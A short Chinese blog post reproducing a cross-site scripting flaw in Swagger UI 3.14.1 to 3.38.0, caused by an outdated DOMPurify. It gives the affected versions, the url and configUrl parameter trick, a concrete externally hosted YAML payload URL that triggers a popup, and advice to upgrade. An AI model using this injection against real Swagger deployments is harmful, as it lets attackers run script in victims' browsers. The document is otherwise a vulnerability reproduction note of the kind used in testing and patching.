swagger xss漏洞复现

扣脚大汉在网络2024-04-27 9:39

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户

根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗

json网站:https://jumpy-floor.surge.sh/test.yaml

拼接方式

?url=https://your_api_spec/spec.yaml

?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新

相关推荐
lifejump1 天前
Empire(帝国)CMS 7.5 XSS注入
前端·安全·xss
哆来A梦没有口袋4 天前
前端视角:浏览器的安全机制
安全策略·xss·csrf·浏览器的安全策略·前端面试题安全策略
介一安全17 天前
【Web安全】Blind XSS漏洞:从挖掘到防御
安全·web安全·xss
\xin19 天前
pikachu自编exp,xss反射性get,post,存储型xss,dom,dom-x
前端·javascript·xss
\xin19 天前
pikachu自编exp,xss之盲打,过滤,htmlspecialchars,href,js
前端·xss
其实防守也摸鱼20 天前
面试常问问题总结--渗透测试工程师方向
网络·sql·面试·职场和发展·xss·工具·owasp
淼淼爱喝水21 天前
基于DOM型XSS漏洞与利用实验教程
前端·xss·dom·dvwa
天山@12322 天前
跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系
网络安全·xss·beef
兄弟加油,别颓废了。22 天前
XSS-Labs 前 5 关 超详细通关全解
前端·xss
牛奶24 天前
黑客是怎么偷走你账号的?
黑客·浏览器·xss
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03【AI】2026 年具身智能模型和世界模型总结04CC-Switch & Claude 基于 Linux 服务器安装使用指南05人工智能最新动态 AI 日报 · 2026年5月10日06Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓07AI科技热点日报 | 2026年5月11日08零基础教你claude code 接入 deepseek V409裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)